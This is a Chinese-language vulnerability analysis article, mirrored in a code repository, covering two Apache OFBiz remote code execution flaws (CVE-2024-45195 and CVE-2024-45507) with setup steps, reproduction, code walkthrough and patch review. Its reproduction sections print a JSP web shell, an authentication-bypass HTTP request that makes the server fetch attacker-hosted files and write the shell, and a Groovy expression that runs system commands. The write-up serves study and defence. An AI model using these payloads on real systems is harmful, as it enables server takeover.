admin/wxvl
1
0
Fork 0
mirror of https://github.com/gelusus/wxvl.git synced 2025-07-30 06:24:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
wxvl/doc/2024-11/Apache OFBiz 命令执行漏洞分析(CVE-2024-45195、CVE-2024-45507).md

311 lines
14 KiB
Markdown
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache OFBiz 命令执行漏洞分析CVE-2024-45195、CVE-2024-45507
原创 元亨-blckder02 中孚安全技术研究 2024-11-13 17:31
1. 环境搭建
   
下载地址:
https://archive.apache.org/dist/ofbiz/
解压后用 IDEA 打开,点击右侧栏 Gradle 中的 build 之后会生成一个 biuld 目录,该目录下面会生成一个 ofbiz.jarRun/Debug Configurations 中会自动生成一个 Gradle 配置项;
新增 JAR Application添加指定 ofbiz.jar 路径。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSF4TPULibwic2JJD4k2icuAJibp5x0wbxvoMzTeyZ1n7cOvYg7CHA3oXrxwA/640?wx_fmt=png&from=appmsg "")
启动这个jar。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFBo6pYcFAoEKTxeksN4ucRZ5V3rBtauN4Nct6ww4KNPcFLPibeIoPd9Q/640?wx_fmt=png "")
能成功访问
https://localhost:8443/webtools
就说明环境搭好了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFh3tLsbcX0JsuENjXThGA9Moyx6icX8pVqSvvkCAVZh4vOyacj4A6nNA/640?wx_fmt=png "")
## 2. CVE-2024-45195  
### 2-1. 前言  
**官方公告:**
https://issues.apache.org/jira/browse/OFBIZ-13130
https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy
**漏洞描述:**
通过目录遍历可以绕过授权验证实现命令执行。
**影响版本:**
Apache OFBiz < 18.12.16
   
### 2-2. 漏洞复现  
rceschema.xml:
```
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="60" position="0"></field>
</record>
</data-file>
</data-files>
```
rcereport.csv:
```
<% Runtime.getRuntime().exec(request.getParameter("cmd"));%>
```
起一个http服务将这两个文件放到目录下。
             
```
python -m http.server 8888
```
请求包:
```
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: 127.0.0.1:8443
Cookie: OFBiz.Visitor=10100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 241              
DATAFILE_LOCATION=http://127.0.0.1:8888/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://127.0.0.1:8888/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFHccYRqppb2WXIOrfmNric55d3giaUArfrkMibvUQQOZQloCrLrL4RaMdA/640?wx_fmt=png "")
访问 
https://127.0.0.1:8443/accounting/index.jsp?cmd=calc
,成功执行命令。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFY7wWgELSC8koicNUCaEI9PUpw8K5lYZghIqiaUIu1Zujpurx1uvwq5zw/640?wx_fmt=png&from=appmsg "")
### 2-3. 漏洞分析  
权限绕过的原理和之前一样,通过不需要鉴权的路由来绕过。触发命令执行的文件不同,之前利用的是 ProgramExport.groovy现在利用 ViewDataFile.groovy 。
在 controller.xml 中定义了路由
/viewdatafile
security.auth
为true直接访问需要权限。视图指向
component://webtools/widget/MiscScreens.xml#viewdatafile
,会调用 ViewDataFile.groovy 脚本。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSF2icKYNxXfraXoCvpkpAHNlKUV9MGpx3x4rbSsb41ZdA7zQdibCjTXt1Q/640?wx_fmt=png "")
解读一下 ViewDataFile.groovy 的作用:
1.从请求中获取多个参数的值;
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFBNgpEicqp2ib5YMzVFNDysPt768WzHMVZgcDhXhP1f6qsUkxyFiaWOoibA/640?wx_fmt=png "")
2. DATAFILE_IS_URL 和 DEFINITION_IS_URL 的值表示 DATAFILE_LOCATION 和 DEFINITION_LOCATION 是否为一个 URL为 ture 则直接创建URL对象为 false 则将文件路径转换为 URL。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFyJd1IM8OOq3ku3Abg8LVHvdKNOvx220uLfMTIA4LicHUiaVE0BpicHkSA/640?wx_fmt=png&from=appmsg "")
3. 从 DEFINITION_LOCATION 的 URL 地址获取文件中定义的数据文件的名称列表。满足 
dataFileUrl && definitionUrl && definitionNames
 为 true则根据定义文件 DEFINITION_LOCATION 的内容和 DEFINITION_NAME 名称,从 DATAFILE_LOCATION 地址读取数据文件内容。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFyHzu99rVlxBsyH6f6cmRzBVXOFV3ngtK0Az9gdDCOiamiaUxNVzJ10yg/640?wx_fmt=png&from=appmsg "")
4. 将上面读取到的数据文件内容写入 DATAFILE_SAVE 指定的文件。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFWEBQB2NibmstC4iblUZGsEBoAAn9Bz2kcGAep3LibKDcOm7rIGnlByz4w/640?wx_fmt=png "")
也就是说,该文件实现了一个数据读取和写入的功能,并且能解析 JSP 文件也就是能通过写入JSP shell 来实现命令执行。
定义文件的格式在
> 《OFBiz 的数据文件工具》
> https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz%27s+Data+File+Tools
中有介绍,通过 xml 格式来定义要写入的数据文件的信息。
xml 文件中 
data-file.name
 表示数据文件名称(并非文件名),需与 POST 传入的 DEFINITION_NAME 的值一致
record.name
 表示实体名称。
field.name
 表示实体字段的名称,也就是指向 DATAFILE_LOCATION 文件,读取数据文件后会使用该名称以键值对的形式保存。
field.type
 表示数据类型,
field.length
 表示字段的长度,需与实际数据长度一致,
field.position
 表示该字段开始读取的位置。
调试看看,简单过一下权限绕过和视图解析的几个点。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFbAibzhKHn79sedCUmZViaCm8N65OlFKWPFpYHGDuaEkXjmWmBIxseRYQ/640?wx_fmt=png "")
进入 ViewDataFile.groovy获取了前端传入的参数dataFileSave 为数据文件写入的文件路径dataFileLoc 为数据文件的 URL 地址definitionLoc 为xml定义文件的URL地址definitionName 为定义文件中定义的名称。
dataFileIsUrl 和definitionIsUrl 为true表示文件地址为URL格式所以 dataFileUrl 和 definitionUrl 分别为数据文件和定义文件的URL对象。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFQnvl95I0VXKZ1TBiaSDCibLez52DmxcE6ZiaYG7D1xycAgf6ThQWYj6Ng/640?wx_fmt=png&from=appmsg "")
跟进 ModelDataFileReader.getModelDataFileReader(),要 new 一个 ModelDataFileReader 对象,在 createModelDataFiles() 中去读取并解析远程的xml文件返回 ModelDataFileReader 对象,并从中获取数据文件名称。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSF6uF7yVnVNPo9Ik321ia7sF1UG3dt3QmspSODuakfGK8IU7oZ05ndMwA/640?wx_fmt=png&from=appmsg "")
接着跟进 DataFile.readFile(),同样调用了 ModelDataFileReader.getModelDataFileReader(),从中获取与 dataFileName 对应的 ModelDataFile 对象,包装成 DataFile 对象返回,其中包含了数据文件的结构信息。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFqOaTj7ficYgIX8j2naIHIKsniaVESmQTxebYbzYu7iaUoS7kjDibNet1dA/640?wx_fmt=png&from=appmsg "")
然后调用 dataFile.readDataFile(fileUrl),逐行读取远程数据文件的内容,以键值对的形式保存到 DataFile 对象的实体字段中。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFBxe87NeicyZzJrAIrxhzrpT0XOHRt2XW7nHSTG1lXiaEmoAwoBOjCqNw/640?wx_fmt=png&from=appmsg "")
最后就是调用 dataFile.writeDataFile(dataFileSave),将 DataFile 对象中保存的数据文件内容写入到指定的文件中。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFESy6Ja4xDSDndo4ZKiav2UwED9mpIddNicpxuH95WcyicjVteKficmc6YA/640?wx_fmt=png&from=appmsg "")
当从前端访问该 jsp 文件时,就会解析内容,实现命令执行。    
## 3. CVE-2024-45507  
### 3-1. 前言  
**官方公告:**
https://issues.apache.org/jira/browse/OFBIZ-13132
https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy
**漏洞描述:**
由于Apache OFBiz在从 Groovy 加载文件时对 URL 的验证不足,导致远程攻击者可以通过服务器端请求伪造的方式向任意系统发起请求,并可能导致远程代码执行,成功利用此漏洞可能允许攻击者完全控制受影响的系统,包括访问敏感数据、执行任意命令或进行进一步的网络攻击。
**影响版本:**
Apache OFBiz < 18.12.16
### 3-2. 漏洞复现
写一个屏幕定义文件 ssrfpoc.xmlvalue 设为一段 groovy 表达式来执行命令:
```
<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
<screen name="StatsDecorator">
<section>
<actions>
<set field="headerItem" value="${groovy:throw new Exception('cmd /c start calc'.execute().text);}"/>
<entity-one entity-name="FinAccount" value-field="finAccount"/>
</actions>
</section>
</screen>
</screens>
```
/webtools/control/forgotPassword/StatsSinceStart
传递定义文件。
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: 127.0.0.1:8443
Cookie: OFBiz.Visitor=10100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
statsDecoratorLocation=http://127.0.0.1:8888/ssrfpoc.xml
```
执行命令。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFh2VNniaxD2l3EuRS0HxWuJZY1X8WNn6Y9a0hnKjItFJs313UbJyGnqg/640?wx_fmt=png&from=appmsg "")
### 3-3. 漏洞分析  
在 controller.xml 中定义了路由 
/StatsSinceStart
security.auth
 为  true直接访问需要权限。视图指向
component://webtools/widget/StatsScreens.xml#StatsSinceStart
,会调用 StatsSinceStart.groovy 脚本,但是这里没有可利用的点。
在 StatsSinceStart.xml 的 
<widgets>
 
标签下名为 
StatsDecorator
 装饰器屏幕的定义中,
${parameters.statsDecoratorLocation}
 是前端可控的,允许从远程加载屏幕定义文件。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFOia4m2WHbsS7AyulpfWGJZeVkicUVoe2kYXVhrQ6g2l2iaia5cjQamAxKQ/640?wx_fmt=png&from=appmsg "")
读取 StatsScreens.xml 文件,逐层解析标签到 StatsDecorator 装饰器,从前端 statsDecoratorLocation 参数获取到远程 StatsDecorator 定义文件的地址。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFpoajzEA7EQNGPUZMoS5ibWdNfVpu8W0sQsRaawSlSyMAk8py9duqsQw/640?wx_fmt=png&from=appmsg "")
从远程地址获取到名为 StatsDecorator 的屏幕定义内容。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFmhDjwg9260Xa4k1pYGibEWMQyWJI3ibbNd6rq7tRcXcTGSbVomTNHxDQ/640?wx_fmt=png&from=appmsg "")
也是逐层解析标签,然后执行并解析
this.valueExdr
表达式。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFZs4Vwbk4E7YsdEyibfBuM6spUdSetXLWib7qCoUduYof6B35xZic7EGQw/640?wx_fmt=png&from=appmsg "")
跟进创建
groo
v
y 脚本实例,绑定了上下文数据。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFBUsribw8SZt0mUO6GApOb0yc0G74KUq1rcfFzBlcq5xU1XRBzht7ibQA/640?wx_fmt=png&from=appmsg "")
run() 执行该脚本,调用 ProcessGroovyMethods.execute() 执行系统命令。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFyicZsOjYbTCib8rPGvgTvm5Is3LLG6ZulcgVOkMLIic3MCmPyVIdqbzOA/640?wx_fmt=png&from=appmsg "")
## 4. 补丁分析  
18.12.16 版本,在进行视图解析的 RequestHandler.renderView() 中,添加了一段对当前要访问的视图进行权限检查的代码。
当满足 viewMap.securityAuth 为true且当前为未登录状态时就会进入if分支进行登录校验登录失败则抛出异常停止视图解析。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/kAeFn7TN57OXibkW66BxTCXic1ppC2YfSFGatgkMbE9bHh7VV59XLnXDicS6nLVw8icgSDZO1KvTb5U3flMHsDQwug/640?wx_fmt=png "")
**参考链接:**
https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
https://forum.butian.net/article/586
https://xz.aliyun.com/t/15569
Reference in New Issue View Git Blame Copy Permalink